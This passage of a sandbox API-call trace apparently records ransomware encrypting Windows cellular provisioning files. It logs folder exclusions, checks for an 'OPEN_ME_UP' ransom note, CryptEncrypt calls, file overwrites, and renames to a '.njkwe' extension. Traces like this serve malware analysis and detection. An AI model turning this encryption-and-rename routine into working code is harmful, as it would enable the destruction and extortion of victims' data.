lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.707] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.707] CloseHandle (hObject=0x43c) returned 1 [0078.707] GetProcessHeap () returned 0xbe0000 [0078.707] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.707] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 195 [0078.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\375__connections_cellular_mtc saudi arabia (saudi arabia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\375__Connections_Cellular_MTC Saudi Arabia (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\375__connections_cellular_mtc saudi arabia (saudi arabia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.707] GetProcessHeap () returned 0xbe0000 [0078.707] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.707] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90dc1962, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90dc1962, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90dc1962, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x28b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="376__C~1.PRO")) returned 1 [0078.707] lstrcmpiW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.708] lstrcmpiW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.708] lstrcmpiW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.708] lstrcmpiW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.708] lstrcmpiW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.708] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml") returned 162 [0078.708] StrStrIW (lpFirst="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.708] lstrcmpW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.708] lstrcmpW (lpString1="376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.708] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.708] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\376__connections_cellular_stc (saudi arabia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.708] GetTickCount () returned 0x1154013 [0078.708] GetTickCount () returned 0x1154013 [0078.708] GetTickCount () returned 0x1154013 [0078.708] GetTickCount () returned 0x1154013 [0078.708] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.708] GetProcessHeap () returned 0xbe0000 [0078.708] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.708] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0078.730] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd75, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.730] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x28b, lpOverlapped=0x0) returned 1 [0078.731] GetProcessHeap () returned 0xbe0000 [0078.731] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.731] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.731] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.731] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.731] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.731] CloseHandle (hObject=0x43c) returned 1 [0078.731] GetProcessHeap () returned 0xbe0000 [0078.731] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.731] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.732] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\376__connections_cellular_stc (saudi arabia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\376__Connections_Cellular_STC (Saudi Arabia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\376__connections_cellular_stc (saudi arabia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.732] GetProcessHeap () returned 0xbe0000 [0078.732] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.732] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90dc1962, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90dc1962, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90dc1962, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2e7, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", cAlternateFileName="377__C~1.PRO")) returned 1 [0078.734] lstrcmpiW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.734] lstrcmpiW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.734] lstrcmpiW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.734] lstrcmpiW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.734] lstrcmpiW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.734] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml") returned 195 [0078.734] StrStrIW (lpFirst="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.734] lstrcmpW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.734] lstrcmpW (lpString1="377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.734] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.734] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\377__connections_cellular_mobilna telefonija srbije rs (serbia (republic of))_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.735] GetTickCount () returned 0x1154032 [0078.735] GetTickCount () returned 0x1154032 [0078.735] GetTickCount () returned 0x1154032 [0078.735] GetTickCount () returned 0x1154032 [0078.735] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.735] GetProcessHeap () returned 0xbe0000 [0078.735] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.735] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2e7, lpOverlapped=0x0) returned 1 [0078.736] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd19, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.736] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2e7, lpOverlapped=0x0) returned 1 [0078.736] GetProcessHeap () returned 0xbe0000 [0078.736] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.737] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.737] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.737] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.737] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.737] CloseHandle (hObject=0x43c) returned 1 [0078.737] GetProcessHeap () returned 0xbe0000 [0078.737] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.737] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 215 [0078.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\377__connections_cellular_mobilna telefonija srbije rs (serbia (republic of))_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\377__Connections_Cellular_Mobilna telefonija Srbije RS (Serbia (Republic of))_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\377__connections_cellular_mobilna telefonija srbije rs (serbia (republic of))_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.738] GetProcessHeap () returned 0xbe0000 [0078.738] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.738] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90de7bce, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90de7bce, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90de7bce, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x386, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", cAlternateFileName="378__C~1.PRO")) returned 1 [0078.738] lstrcmpiW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.738] lstrcmpiW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.738] lstrcmpiW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.738] lstrcmpiW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.738] lstrcmpiW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.738] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml") returned 160 [0078.738] StrStrIW (lpFirst="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.738] lstrcmpW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.738] lstrcmpW (lpString1="378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.738] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.738] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\378__connections_cellular_telenor (serbia)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.739] GetTickCount () returned 0x1154032 [0078.739] GetTickCount () returned 0x1154032 [0078.739] GetTickCount () returned 0x1154032 [0078.739] GetTickCount () returned 0x1154032 [0078.739] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.739] GetProcessHeap () returned 0xbe0000 [0078.739] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0078.739] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x386, lpOverlapped=0x0) returned 1 [0078.741] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffc7a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.741] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x386, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x386, lpOverlapped=0x0) returned 1 [0078.741] GetProcessHeap () returned 0xbe0000 [0078.741] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0078.741] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.741] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.741] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.741] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.741] CloseHandle (hObject=0x43c) returned 1 [0078.741] GetProcessHeap () returned 0xbe0000 [0078.741] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.741] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\378__connections_cellular_telenor (serbia)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\378__Connections_Cellular_Telenor (Serbia)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\378__connections_cellular_telenor (serbia)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.742] GetProcessHeap () returned 0xbe0000 [0078.742] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.742] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90de7bce, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90de7bce, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90de7bce, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x37c, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", cAlternateFileName="379__C~1.PRO")) returned 1 [0078.742] lstrcmpiW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.742] lstrcmpiW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.742] lstrcmpiW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.742] lstrcmpiW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.742] lstrcmpiW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.742] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml") returned 160 [0078.742] StrStrIW (lpFirst="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.742] lstrcmpW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.742] lstrcmpW (lpString1="379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.743] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.743] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\379__Connections_Cellular_Telenor (Serbia)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\379__connections_cellular_telenor (serbia)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.743] GetTickCount () returned 0x1154032 [0078.743] GetTickCount () returned 0x1154032 [0078.743] GetTickCount () returned 